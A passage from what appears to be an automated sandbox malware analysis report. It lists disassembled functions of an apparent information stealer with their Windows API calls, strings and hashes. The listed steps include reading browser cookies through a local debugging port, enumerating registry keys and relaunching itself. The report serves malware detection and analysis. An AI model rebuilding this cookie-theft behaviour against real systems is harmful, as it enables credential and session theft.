                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 4107348322-3310892237
                        • Opcode ID: 77d390b91b35232944ce00eabe41f0639ef6c86ef6e42aa873774e9336cd38e3
                        • Instruction ID: 527f0b6d50c8e74948d8859c78735f3e9ba2f387407c2c1ec4b87bd8e3505738
                        • Opcode Fuzzy Hash: 77d390b91b35232944ce00eabe41f0639ef6c86ef6e42aa873774e9336cd38e3
                        • Instruction Fuzzy Hash: 94B1B5B1B1120A9BCB31EF76D9499AF7BB9FF44304F044429FA4597291DB78EC028B94
                        Function 004F92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004F90C0: InternetOpenA.WININET(0051CFEC,00000001,00000000,00000000,00000000), ref: 004F90DF
                          • Part of subcall function 004F90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004F90FC
                          • Part of subcall function 004F90C0: InternetCloseHandle.WININET(00000000), ref: 004F9109
                        • strlen.MSVCRT ref: 004F92E1
                        • strlen.MSVCRT ref: 004F92FA
                          • Part of subcall function 004F8980: std::_Xinvalid_argument.LIBCPMT ref: 004F8996
                        • strlen.MSVCRT ref: 004F9399
                        • strlen.MSVCRT ref: 004F93E6
                        • lstrcat.KERNEL32(?,cookies), ref: 004F9547
                        • lstrcat.KERNEL32(?,00521794), ref: 004F9559
                        • lstrcat.KERNEL32(?,?), ref: 004F956A
                        • lstrcat.KERNEL32(?,00524B98), ref: 004F957C
                        • lstrcat.KERNEL32(?,?), ref: 004F958D
                        • lstrcat.KERNEL32(?,.txt), ref: 004F959F
                        • lstrlen.KERNEL32(?), ref: 004F95B6
                        • lstrlen.KERNEL32(?), ref: 004F95DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F9614
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                        • API String ID: 1201316467-3542011879
                        • Opcode ID: fd9216cf78953ac9c9cc7b5a3e6da5501e56c6c6e20628d02a2158ed44d00f94
                        • Instruction ID: b579df872f14d006a637db525ecb6b886b29d6cf006332773751b75f88c80534
                        • Opcode Fuzzy Hash: fd9216cf78953ac9c9cc7b5a3e6da5501e56c6c6e20628d02a2158ed44d00f94
                        • Instruction Fuzzy Hash: E4E12971E0021CEBDF14DFA8D980AEEBBB5BF48304F1444AAE609A7281DB749E45CF55
                        Function 0050D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 0050D9A1
                        • memset.MSVCRT ref: 0050D9B3
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050D9DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050DA0E
                        • lstrcat.KERNEL32(?,00000000), ref: 0050DA1C
                        • lstrcat.KERNEL32(?,0103DF78), ref: 0050DA36
                        • lstrcat.KERNEL32(?,?), ref: 0050DA4A
                        • lstrcat.KERNEL32(?,0103CFE0), ref: 0050DA5E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050DA8E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0050DA95
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050DAFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2367105040-0
                        • Opcode ID: 485fc6aa28837203f5d40cbb38b84230e310b62185a2d4c7e4d1d1c2541a7072
                        • Instruction ID: c69b4596d38a6e0e5ec54148a7a687972d3ccf4ada797801f82fa0b82de16411
                        • Opcode Fuzzy Hash: 485fc6aa28837203f5d40cbb38b84230e310b62185a2d4c7e4d1d1c2541a7072
                        • Instruction Fuzzy Hash: A3B19171E1025D9BDB20EFA4DC849EE7BB9FF48304F048569EA05A7290DB389E45CB64
                        Function 004FB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FB330
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB37E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB3A9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FB3B1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB3D9
                        • lstrlen.KERNEL32(00524C50), ref: 004FB450
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB474
                        • lstrcat.KERNEL32(00000000,00524C50), ref: 004FB480
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB4A9
                        • lstrlen.KERNEL32(00000000), ref: 004FB52D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB557
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FB55F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB587
                        • lstrlen.KERNEL32(00524AD4), ref: 004FB5FE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB622
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 004FB62E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB65E
                        • lstrlen.KERNEL32(?), ref: 004FB767
                        • lstrlen.KERNEL32(?), ref: 004FB776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB79E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: f5f212e3cfeacb8af6f4085a6bbb2a8dee466a9bbe72e1c6af0a129ad95c2daa
                        • Instruction ID: 1a5f21f291ea6f0593d0ed03f88193ebbd7739f39bd2b6d0cbca07a04a651f4e
                        • Opcode Fuzzy Hash: f5f212e3cfeacb8af6f4085a6bbb2a8dee466a9bbe72e1c6af0a129ad95c2daa
                        • Instruction Fuzzy Hash: CC025F30A01209CFDB25DF55D949A7BB7B5EF41308F18806EEA099B3A1D779DC42CB89
                        Function 00513760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        • RegOpenKeyExA.ADVAPI32(?,0103B0B0,00000000,00020019,?), ref: 005137BD
                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 005137F7
                        • wsprintfA.USER32 ref: 00513822
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00513840
                        • RegCloseKey.ADVAPI32(?), ref: 0051384E
                        • RegCloseKey.ADVAPI32(?), ref: 00513858
                        • RegQueryValueExA.ADVAPI32(?,0103DD20,00000000,000F003F,?,?), ref: 005138A1
                        • lstrlen.KERNEL32(?), ref: 005138B6
                        • RegQueryValueExA.ADVAPI32(?,0103DCD8,00000000,000F003F,?,00000400), ref: 00513927
                        • RegCloseKey.ADVAPI32(?), ref: 00513972
                        • RegCloseKey.ADVAPI32(?), ref: 00513989
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 13140697-3278919252
                        • Opcode ID: 79146fc424947cae001ac9b431ee5ba5d4ad90fa4b99180fb67b4a784cc909c5
                        • Instruction ID: 1fa85e560f0d4cb2036c7fbff4c292551547a72c272ef0bef697202bb2faba62
                        • Opcode Fuzzy Hash: 79146fc424947cae001ac9b431ee5ba5d4ad90fa4b99180fb67b4a784cc909c5
                        • Instruction Fuzzy Hash: 97918272E002099FDB20DF94DD849EEBBB9FF48310F148569E609A7251D7359E86CF90
                        Function 004F90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenA.WININET(0051CFEC,00000001,00000000,00000000,00000000), ref: 004F90DF
                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004F90FC
                        • InternetCloseHandle.WININET(00000000), ref: 004F9109
                        • InternetReadFile.WININET(?,?,?,00000000), ref: 004F9166
                        • InternetReadFile.WININET(00000000,?,00001000,?), ref: 004F9197
                        • InternetCloseHandle.WININET(00000000), ref: 004F91A2
                        • InternetCloseHandle.WININET(00000000), ref: 004F91A9
                        • strlen.MSVCRT ref: 004F91BA
                        • strlen.MSVCRT ref: 004F91ED
                        • strlen.MSVCRT ref: 004F922E
                        • strlen.MSVCRT ref: 004F924C
                          • Part of subcall function 004F8980: std::_Xinvalid_argument.LIBCPMT ref: 004F8996
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                        • API String ID: 1530259920-2144369209
                        • Opcode ID: e959ed68feb2b967745d55c761e25320199bf29ba1aeff146c44e0c93ae1f195
                        • Instruction ID: b8798ebff71901d29fdb8f0bcde8bf2a9767e38473d3dbd4861a5592432d5da1
                        • Opcode Fuzzy Hash: e959ed68feb2b967745d55c761e25320199bf29ba1aeff146c44e0c93ae1f195
                        • Instruction Fuzzy Hash: 3451E8716402096BEB20DFA4DC45FEEBBF9EF48710F14406AF504E32C0DBB5A9458B65
                        Function 00511660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 005116A1
                        • lstrcpy.KERNEL32(00000000,0102B270), ref: 005116CC
                        • lstrlen.KERNEL32(?), ref: 005116D9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005116F6
                        • lstrcat.KERNEL32(00000000,?), ref: 00511704
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0051172A
                        • lstrlen.KERNEL32(01039B68), ref: 0051173F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00511762
                        • lstrcat.KERNEL32(00000000,01039B68), ref: 0051176A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511792
                        • ShellExecuteEx.SHELL32(?), ref: 005117CD
                        • ExitProcess.KERNEL32 ref: 00511803
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                        • String ID: <
                        • API String ID: 3579039295-4251816714
                        • Opcode ID: b0bc65b94e6a4a770f1940374052b90ccec332d087dc66f8e8c6563a0d1dc2a6
                        • Instruction ID: ffb776f8882fae7d3093649e63888b824f4619bdbf110fbfe81b090a00031c1e
                        • Opcode Fuzzy Hash: b0bc65b94e6a4a770f1940374052b90ccec332d087dc66f8e8c6563a0d1dc2a6
                        • Instruction Fuzzy Hash: 17517670A0161D9BDB21DFA5CD84ADEBBF9FF44300F044169E605D3391DB74AE468B58
                        Function 0050EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050EFE4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F012
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0050F026
                        • lstrlen.KERNEL32(00000000), ref: 0050F035
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 0050F053
                        • StrStrA.SHLWAPI(00000000,?), ref: 0050F081
                        • lstrlen.KERNEL32(?), ref: 0050F094
                        • lstrlen.KERNEL32(00000000), ref: 0050F0B2
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0050F0FF
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0050F13F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$AllocLocal
                        • String ID: ERROR
                        • API String ID: 1803462166-2861137601
                        • Opcode ID: 2a3c0bc1bcf6e445d005d27bd83b6802127062ba9b0d201e2ad0bab1adc55c29
                        • Instruction ID: 39df69c897e30bc2e3835fdd92faf0077174b9b29af02422ed28a14c27b40caa
                        • Opcode Fuzzy Hash: 2a3c0bc1bcf6e445d005d27bd83b6802127062ba9b0d201e2ad0bab1adc55c29
                        • Instruction Fuzzy Hash: 7A51AE31A102099BCB31AF35DD49A7E7BA5FF55304F08842DF94A9B292DB78DC028B94
                        Function 004FA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentVariableA.KERNEL32(01038880,00729BD8,0000FFFF), ref: 004FA026
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FA053
                        • lstrlen.KERNEL32(00729BD8), ref: 004FA060
                        • lstrcpy.KERNEL32(00000000,00729BD8), ref: 004FA08A
                        • lstrlen.KERNEL32(00524C4C), ref: 004FA095
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FA0B2
                        • lstrcat.KERNEL32(00000000,00524C4C), ref: 004FA0BE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FA0E4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FA0EF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FA114
                        • SetEnvironmentVariableA.KERNEL32(01038880,00000000), ref: 004FA12F
                        • LoadLibraryA.KERNEL32(0103D2E8), ref: 004FA143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
